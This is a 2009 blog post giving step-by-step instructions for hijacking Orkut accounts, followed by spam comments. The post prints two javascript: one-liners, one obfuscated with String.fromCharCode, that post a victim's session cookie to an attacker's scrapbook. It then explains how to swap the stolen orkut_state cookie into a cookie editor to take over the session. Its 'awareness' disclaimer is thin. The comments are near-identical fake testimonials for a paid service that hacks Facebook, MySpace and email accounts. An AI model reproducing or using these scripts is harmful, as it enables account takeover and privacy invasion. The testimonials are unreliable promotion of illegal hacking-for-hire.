Thursday, February 26, 2009

Orkut Groups/Accounts/Video Hacking Information

Orkut Groups/Accounts/Video Hacking Information
Google change its Codes After attacks from remote Scripts.

All Hacking Tricks was :

Hacker Stealing your Cookies From cookie editor plugin for it.
Then they make two fake account , then they send a cookie stealer script in the target scrapbook , when victim click on that link , the cookie of the victim will be save.

javascript:nobody=replyForm;nobody.toUserId.value=62915936;
nobody.scrapText.value=eval
(String.fromCharCode(100,111,99,117,109,101,110,116,46,99,
111,111,107,105,101));
nobody.action='Scrapbook.aspx?Action.writeScrapBasic';
nobody.submit()

Following codes shows " 62915936 " part of Stealing cookie Script.

After that Hackers ...

1) Go to your home page

2) Open the cookie editor plugin(TOOLS-->COOKIE EDITOR).

3) Type orkut in the text box and click filter/refresh.look for orkut_state cookie.

4) Just double click it and replace the orkut_state part with your victims. No need to change the _umbz _umbc part...

5) THATS IT!!

ANOTHER SCRIPT : (100%working)

javascript:nobody=replyForm;nobody.toUserId.value=53093255;

nobody.scrapText.value=document.cookie;nobody.

action='scrapbook.aspx?Action.submit';nobody.submit()

Put ur eight digit number in the place of (53093255)



orkut hacks, orkut Tricks, Orkut Account hack, Orkut Profile Hack , orkut Id hack, Orkut cookie Stealer , Orkut Scrap Hacking Script, orkut Fake Account hack and many more way to hack orkut accounts


Disclaimers : -

Following information is only for the awareness relate to orkut script, we hope orkut team already closed this bug.

3 comments:

Anonymous | December 9, 2009 at 6:19 PM  

Very good and fast how to hack facebook passwords.

http://www.rayahari.net/hack-MySpace-passwords.php thanks for hacking of my girlfriend. It was a pleasure to do business with RayaHari.com. I will come to RayaHari.com again for sure. I am very happy to use this hacking service. Professional and quick. Thank RayaHari.com have proved it again ! If you give the full target info these guys ask for, mind you they will get the password within few days!! I am using this service 3rd time and will use it again to facebook hacking.

BTW, I found another website that can hack yahoo passwords and other one specialized in hack into hotmail passwords.

Diane Calhoun, New York

US

Anonymous | December 10, 2009 at 7:11 PM  

http://www.rayahari.net/facebook-hacking-tool.php are reliable!

Their service how to hack facebook accounts is incredible!

I was a little antsy waiting for know facebook hacking but once I got the email that they had gotten in and I saw the proof my heart dropped! Within minutes of making the payment I had the password! This is real, not no gimmick! I highly recommend these guys! I know ppl are always iffy about trusting such a site, but I was desparate and said FUCK IT thank goodness that RayaHari.com is legit! I thank a bunch, RayaHari is the BEST!!!!!

BTW, I found another website that can hack yahoo passwords and other one specialized in hack into hotmail passwords.

Diane Calhoun, New York

US

Anonymous | December 15, 2009 at 1:36 AM  

I found these people reliable, efficient and not too expensive to how to hack a facebook . I found a bunch of places where people offer their services to hack into facebook. It costs a lot! Has anyone ever used http://www.rayahari.net/hack-MySpace-passwords.php hacking services? They are really professional in hacking email password. I would recommend them. Thank you.

BTW, I found another website that can hack yahoo passwords and other one specialized in hack into hotmail passwords.

Diane Calhoun, Lincoln

England

Post a Comment